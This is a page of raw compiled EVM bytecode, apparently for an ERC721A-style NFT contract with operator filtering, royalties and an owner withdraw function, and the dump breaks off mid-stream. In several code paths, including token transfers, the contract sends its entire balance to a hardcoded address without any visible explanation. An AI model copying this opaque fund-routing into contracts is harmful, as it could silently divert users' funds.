0006103e8603285610ad69190612cfa565b610ae09190612d6b565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b600a5481610b1e61095a565b610b289190612d9c565b1115610b3357600080fd5b610b3c81611833565b50565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b9957600080fd5b81600c8190555080600a819055505050565b6000471115610c105773bbdc83e05067678903892cbaccc4ec6b578355f873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c0e573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c6e57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cb4573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e07573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d3b57610d3684848461198e565b610e13565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d84929190612c60565b602060405180830381865afa158015610da1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dc59190612c9e565b610e0657336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610dfd91906125a8565b60405180910390fd5b5b610e1284848461198e565b5b50505050565b600c5481565b6000610e2a826119ae565b9050919050565b600b5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9e576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f24906129bb565b80601f0160208091040260200160405190810160405280929190818152602001828054610f50906129bb565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110a2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161101f929190612c60565b602060405180830381865afa15801561103c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110609190612c9e565b6110a157806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161109891906125a8565b60405180910390fd5b5b6110ac8383611a7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111f0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f85858585611b85565b6111fd565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d929190612c60565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190612c9e565b6111ef57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016111e691906125a8565b60405180910390fd5b5b6111fc85858585611b85565b5b5050505050565b600d5481565b6060600961121783611bf8565b604051602001611228929190612edb565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461129857600080fd5b600a54816112a461095a565b6112ae9190612d9c565b11156112b957600080fd5b6112c38282611c48565b5050565b600a5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161136c611504565b1115801561137b575060005482105b80156113b9575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b60006113cb82610e1f565b90508073ffffffffffffffffffffffffffffffffffffffff166113ec611c66565b73ffffffffffffffffffffffffffffffffffffffff161461144f5761141881611413611c66565b6112cd565b61144e576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611511611c6e565b600061151c826119ae565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611583576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061158f84611cda565b915091506115a581876115a0611c66565b611d01565b6115f1576115ba866115b5611c66565b6112cd565b6115f0576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611657576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6116648686866001611d45565b801561166f57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001019190508190555061173d85611719888887611d4b565b7c020000000000000000000000000000000000000000000000000000000017611d73565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416036117c357600060018501905060006004600083815260200190815260200160002054036117c15760005481146117c0578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a461182b8686866001611d9e565b505050505050565b60003403611966576001811461184857600080fd5b6005600a546118579190612d6b565b61185f61095a565b11156119565761186d611e1c565b600f6000438152602001908152602001600020541080156118ce5750600c54600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118d757600080fd5b600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061192790612f0a565b9190505550600f6000438152602001908152602001600020600081548092919061195090612f0a565b91905055505b611961336001611c48565b61198b565b80600b546119749190612cfa565b34101561198057600080fd5b61198a3382611c48565b5b50565b6119a9838383604051806020016040528060008152506110b1565b505050565b600080829050806119bd611504565b11611a4357600054811015611a425760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821603611a40575b60008103611a36576004600083600190039350838152602001908152602001600020549050611a0c565b8092505050611a75565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611a87611c66565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611b34611c66565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611b7991906122b9565b60405180910390a35050565b611b90848484610971565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611bf257611bbb84848484611e44565b611bf1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611c3357600184039350600a81066030018453600a8104905080611c11575b50828103602084039350808452505050919050565b611c62828260405180602001604052806000815250611f94565b5050565b600033905090565b6000471115611cd75773bbdc83e05067678903892cbaccc4ec6b578355f873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611cd1573d6000803e3d6000fd5b50611cd8565b5b565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611d62868684612031565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b6103e76001611dab61095a565b611db59190612d9c565b10611e165773bbdc83e05067678903892cbaccc4ec6b578355f873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611e14573d6000803e3d6000fd5b505b50505050565b6000600c611e2861095a565b600a54611e359190612f52565b611e3f9190612d6b565b905090565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611e6a611c66565b8786866040518563ffffffff1660e01b8152600401611e8c9493929190612fdb565b6020604051808303816000875af1925050508015611ec857506040513d601f19601f82011682018060405250810190611ec5919061303c565b60015b611f41573d8060008114611ef8576040519150601f19603f3d011682016040523d82523d6000602084013e611efd565b606091505b506000815103611f39576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b611f9e838361203a565b60008373ffffffffffffffffffffffffffffffffffffffff163b1461202c57600080549050600083820390505b611fde6000868380600101945086611e44565b612014576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611fcb57816000541461202957600080fd5b50505b505050565b60009392505050565b6000805490506000820361207a576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6120876000848385611d45565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506120fe836120ef6000866000611d4b565b6120f8856121f5565b17611d73565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b81811461219f57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050612164565b50600082036121da576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506121f06000848385611d9e565b505050565b60006001821460e11b9050919050565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b61224e81612219565b811461225957600080fd5b50565b60008135905061226b81612245565b92915050565b6000602082840312156122875761228661220f565b5b60006122958482850161225c565b91505092915050565b60008115159050919050565b6122b38161229e565b82525050565b60006020820190506122ce60008301846122aa565b92915050565b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b612327826122de565b810181811067ffffffffffffffff82111715612346576123456122ef565b5b80604052505050565b6000612359612205565b9050612365828261231e565b919050565b600067ffffffffffffffff821115612385576123846122ef565b5b61238e826122de565b9050602081019050919050565b82818337600083830152505050565b60006123bd6123b88461236a565b61234f565b9050828152602081018484840111156123d9576123d86122d9565b5b6123e484828561239b565b509392505050565b600082601f830112612401576124006122d4565b5b81356124118482602086016123aa565b91505092915050565b6000602082840312156124305761242f61220f565b5b600082013567ffffffffffffffff81111561244e5761244d612214565b5b61245a848285016123ec565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561249d578082015181840152602081019050612482565b60008484015250505050565b60006124b482612463565b6124be818561246e565b93506124ce81856020860161247f565b6124d7816122de565b840191505092915050565b600060208201905081810360008301526124fc81846124a9565b905092915050565b6000819050919050565b61251781612504565b811461252257600080fd5b50565b6000813590506125348161250e565b92915050565b6000602082840312156125505761254f61220f565b5b600061255e84828501612525565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061259282612567565b9050919050565b6125a281612587565b82525050565b60006020820190506125bd6000830184612599565b92915050565b6125cc81612587565b81146125d757600080fd5b50565b6000813590506125e9816125c3565b92915050565b600080604083850312156126065761260561220f565b5b6000612614858286016125da565b925050602061262585828601612525565b9150509250929050565b61263881612504565b82525050565b6000602082019050612653600083018461262f565b92915050565b6000806000606084860312156126725761267161220f565b5b6000612680868287016125da565b9350506020612691868287016125da565b92505060406126a286828701612525565b9150509250925092565b600080604083850312156126c3576126c261220f565b5b60006126d185828601612525565b92505060206126e285828601612525565b9150509250929050565b60006040820190506127016000830185612599565b61270e602083018461262f565b9392505050565b6000806040838503121561272c5761272b61220f565b5b600061273a858286016125da565b925050602061274b858286016125da565b9150509250929050565b6000819050919050565b600061277a61277561277084612567565b612755565b612567565b9050919050565b600061278c8261275f565b9050919050565b600061279e82612781565b9050919050565b6127ae81612793565b82525050565b60006020820190506127c960008301846127a5565b92915050565b6000602082840312156127e5576127e461220f565b5b60006127f3848285016125da565b91505092915050565b6128058161229e565b811461281057600080fd5b50565b600081359050612822816127fc565b92915050565b6000806040838503121561283f5761283e61220f565b5b600061284d858286016125da565b925050602061285e85828601612813565b9150509250929050565b600067ffffffffffffffff821115612883576128826122ef565b5b61288c826122de565b9050602081019050919050565b60006128ac6128a784612868565b61234f565b9050828152602081018484840111156128c8576128c76122d9565b5b6128d384828561239b565b509392505050565b600082601f8301126128f0576128ef6122d4565b5b8135612900848260208601612899565b91505092915050565b600080600080608085870312156129235761292261220f565b5b6000612931878288016125da565b9450506020612942878288016125da565b935050604061295387828801612525565b925050606085013567ffffffffffffffff81111561297457612973612214565b5b612980878288016128db565b91505092959194509250565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806129d357607f821691505b6020821081036129e6576129e561298c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302612a4e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82612a11565b612a588683612a11565b95508019841693508086168417925050509392505050565b6000612a8b612a86612a8184612504565b612755565b612504565b9050919050565b6000819050919050565b612aa583612a70565b612ab9612ab182612a92565b848454612a1e565b825550505050565b600090565b612ace612ac1565b612ad9818484612a9c565b505050565b5b81811015612afd57612af2600082612ac6565b600181019050612adf565b5050565b601f821115612b4257612b13816129ec565b612b1c84612a01565b81016020851015612b2b578190505b612b3f612b3785612a01565b830182612ade565b50505b505050565b600082821c905092915050565b6000612b6560001984600802612b47565b1980831691505092915050565b6000612b7e8383612b54565b9150826002028217905092915050565b612b9782612463565b67ffffffffffffffff811115612bb057612baf6122ef565b5b612bba82546129bb565b612bc5828285612b01565b600060209050601f831160018114612bf85760008415612be6578287015190505b612bf08582612b72565b865550612c58565b601f198416612c06866129ec565b60005b82811015612c2e57848901518255600182019150602085019450602081019050612c09565b86831015612c4b5784890151612c47601f891682612b54565b8355505b6001600288020188555050505b505050505050565b6000604082019050612c756000830185612599565b612c826020830184612599565b9392505050565b600081519050612c98816127fc565b92915050565b600060208284031215612cb457612cb361220f565b5b6000612cc284828501612c89565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612d0582612504565b9150612d1083612504565b9250828202612d1e81612504565b91508282048414831517612d3557612d34612ccb565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612d7682612504565b9150612d8183612504565b925082612d9157612d90612d3c565b5b828204905092915050565b6000612da782612504565b9150612db283612504565b9250828201905080821115612dca57612dc9612ccb565b5b92915050565b600081905092915050565b60008154612de8816129bb565b612df28186612dd0565b94506001821660008114612e0d5760018114612e2257612e55565b60ff1983168652811515820286019350612e55565b612e2b856129ec565b60005b83811015612e4d57815481890152600182019150602081019050612e2e565b838801955050505b50505092915050565b6000612e6982612463565b612e738185612dd0565b9350612e8381856020860161247f565b80840191505092915050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b6000612ec5600583612dd0565b9150612ed082612e8f565b600582019050919050565b6000612ee78285612ddb565b9150612ef38284612e5e565b9150612efe82612eb8565b91508190509392505050565b6000612f1582612504565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612f4757612f46612ccb565b5b600182019050919050565b6000612f5d82612504565b9150612f6883612504565b9250828203905081811115612f8057612f7f612ccb565b5b92915050565b600081519050919050565b600082825260208201905092915050565b6000612fad82612f86565b612fb78185612f91565b9350612fc781856020860161247f565b612fd0816122de565b840191505092915050565b6000608082019050612ff06000830187612599565b612ffd6020830186612599565b61300a604083018561262f565b818103606083015261301c8184612fa2565b905095945050505050565b60008151905061303681612245565b92915050565b6000602082840312156130525761305161220f565b5b600061306084828501613027565b9150509291505056fea26469706673582212200ca7d66361d90c45c9143df3ecd72a2ba2f4783e05a832b91d633f69fae9eb7264736f6c63430008110033697066733a2f2f62616679626569666c637372666267746d6b67753367656b7a356262677737346a647972767432646a626b70677867646d6b61747a6d6c737a6a692f

Deployed Bytecode

0x60806040526004361061019c5760003560e01c806342842e0e116100ec578063a22cb4651161008a578063c87b56dd11610064578063c87b56dd14610572578063cc47a40b146105af578063d5abeb01146105d8578063e985e9c5146106035761019c565b8063a22cb46514610502578063b88d4fde1461052b578063bc951b91146105475761019c565b80636817c76c116100c65780636817c76c1461044457806370a082311461046f5780638da5cb5b146104ac57806395d89b41146104d75761019c565b806342842e0e146103c0578063604906dc146103dc5780636352211e146104075761019c565b806323b872dd1161015957806338b08fd41161013357806338b08fd41461032c5780633a233f89146103555780633ccfd60b1461037e57806341f43434146103955761019c565b806323b872dd146102b65780632a55205a146102d25780632db11544146103105761019c565b806301ffc9a7146101a1578063028043b1146101de57806306fdde0314610207578063081812fc14610232578063095ea7b31461026f57806318160ddd1461028b575b600080fd5b3480156101ad57600080fd5b506101c860048036038101906101c39190612271565b610640565b6040516101d591906122b9565b60405180910390f35b3480156101ea57600080fd5b506102056004803603810190610200919061241a565b6106d2565b005b34801561021357600080fd5b5061021c61073f565b60405161022991906124e2565b60405180910390f35b34801561023e57600080fd5b506102596004803603810190610254919061253a565b6107d1565b60405161026691906125a8565b60405180910390f35b610289600480360381019061028491906125ef565b610850565b005b34801561029757600080fd5b506102a061095a565b6040516102ad919061263e565b60405180910390f35b6102d060048036038101906102cb9190612659565b610971565b005b3480156102de57600080fd5b506102f960048036038101906102f491906126ac565b610ac1565b6040516103079291906126ec565b60405180910390f35b61032a6004803603810190610325919061253a565b610b12565b005b34801561033857600080fd5b50610353600480360381019061034e91906126ac565b610b3f565b005b34801561036157600080fd5b5061037c60048036038101906103779190612715565b610bab565b005b34801561038a57600080fd5b50610393610c14565b005b3480156103a157600080fd5b506103aa610cb7565b6040516103b791906127b4565b60405180910390f35b6103da60048036038101906103d59190612659565b610cc9565b005b3480156103e857600080fd5b506103f1610e19565b6040516103fe919061263e565b60405180910390f35b34801561041357600080fd5b5061042e6004803603810190610429919061253a565b610e1f565b60405161043b91906125a8565b60405180910390f35b34801561045057600080fd5b50610459610e31565b604051610466919061263e565b60405180910390f35b34801561047b57600080fd5b50610496600480360381019061049191906127cf565b610e37565b6040516104a3919061263e565b60405180910390f35b3480156104b857600080fd5b506104c1610eef565b6040516104ce91906125a8565b60405180910390f35b3480156104e357600080fd5b506104ec610f15565b6040516104f991906124e2565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612828565b610fa7565b005b61054560048036038101906105409190612909565b6110b1565b005b34801561055357600080fd5b5061055c611204565b604051610569919061263e565b60405180910390f35b34801561057e57600080fd5b506105996004803603810190610594919061253a565b61120a565b6040516105a691906124e2565b60405180910390f35b3480156105bb57600080fd5b506105d660048036038101906105d191906125ef565b61123e565b005b3480156105e457600080fd5b506105ed6112c7565b6040516105fa919061263e565b60405180910390f35b34801561060f57600080fd5b5061062a60048036038101906106259190612715565b6112cd565b60405161063791906122b9565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061069b57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106cb5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461072c57600080fd5b806009908161073b9190612b8e565b5050565b60606002805461074e906129bb565b80601f016020809104026020016040519081016040528092919081815260200182805461077a906129bb565b80156107c75780601f1061079c576101008083540402835291602001916107c7565b820191906000526020600020905b8154815290600101906020018083116107aa57829003601f168201915b5050505050905090565b60006107dc82611361565b610812576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561094b576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016108c8929190612c60565b602060405180830381865afa1580156108e5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109099190612c9e565b61094a57806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161094191906125a8565b60405180910390fd5b5b61095583836113c0565b505050565b6000610964611504565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610aaf573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109e3576109de848484611509565b610abb565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610a2c929190612c60565b602060405180830381865afa158015610a49573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a6d9190612c9e565b610aae57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610aa591906125a8565b60405180910390fd5b5b610aba848484611509565b5b50505050565b60008060006103e8603285610ad69190612cfa565b610ae09190612d6b565b9050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168192509250509250929050565b600a5481610b1e61095a565b610b289190612d9c565b1115610b3357600080fd5b610b3c81611833565b50565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b9957600080fd5b81600c8190555080600a819055505050565b6000471115610c105773bbdc83e05067678903892cbaccc4ec6b578355f873ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610c0e573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c6e57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610cb4573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e07573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d3b57610d3684848461198e565b610e13565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610d84929190612c60565b602060405180830381865afa158015610da1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dc59190612c9e565b610e0657336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610dfd91906125a8565b60405180910390fd5b5b610e1284848461198e565b5b50505050565b600c5481565b6000610e2a826119ae565b9050919050565b600b5481565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9e576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f24906129bb565b80601f0160208091040260200160405190810160405280929190818152602001828054610f50906129bb565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b5050505050905090565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156110a2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161101f929190612c60565b602060405180830381865afa15801561103c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110609190612c9e565b6110a157806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161109891906125a8565b60405180910390fd5b5b6110ac8383611a7a565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111f0573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036111245761111f85858585611b85565b6111fd565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161116d929190612c60565b602060405180830381865afa15801561118a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ae9190612c9e565b6111ef57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016111e691906125a8565b60405180910390fd5b5b6111fc85858585611b85565b5b5050505050565b600d5481565b6060600961121783611bf8565b604051602001611228929190612edb565b6040516020818303038152906040529050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461129857600080fd5b600a54816112a461095a565b6112ae9190612d9c565b11156112b957600080fd5b6112c38282611c48565b5050565b600a5481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b60008161136c611504565b1115801561137b575060005482105b80156113b9575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b60006113cb82610e1f565b90508073ffffffffffffffffffffffffffffffffffffffff166113ec611c66565b73ffffffffffffffffffffffffffffffffffffffff161461144f5761141881611413611c66565b6112cd565b61144e576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611511611c6e565b600061151c826119ae565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611583576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061158f84611cda565b915091506115a581876115a0611c66565b611d01565b6115f1576115ba866115b5611c66565b6112cd565b6115f0576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611657576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6116648686866001611d45565b801561166f57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001019190508190555061173d85611719888887611d4b565b7c020000000000000000000000000000000000000000000000000000000017611d73565b600460008681526020019081526020016000208190555060007c02000000000000000000000000000000000000000000000000000000008416036117c357600060018501905060006004600083815260200190815260200160002054036117c15760005481146117c0578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a461182b8686866001611d9e565b505050505050565b60003403611966576001811461184857600080fd5b6005600a546118579190612d6b565b61185f61095a565b11156119565761186d611e1c565b600f6000438152602001908152602001600020541080156118ce5750600c54600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118d757600080fd5b600e60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061192790612f0a565b9190505550600f6000438152602001908152602001600020600081548092919061195090612f0a565b91905055505b611961336001611c48565b61198b565b80600b546119749190612cfa565b34101561198057600080fd5b61198a3382611c48565b5b50565b6119a9838383604051806020016040528060008152506110b1565b505050565b600080829050806119bd611504565b11611a4357600054811015611a425760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821603611a40575b60008103611a36576004600083600190039350838152602001908152602001600020549050611a0c565b8092505050611a75565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b8060076000611a87611c66565b73ffffffffffffffffffffffffffffffffffffffff1673ffffff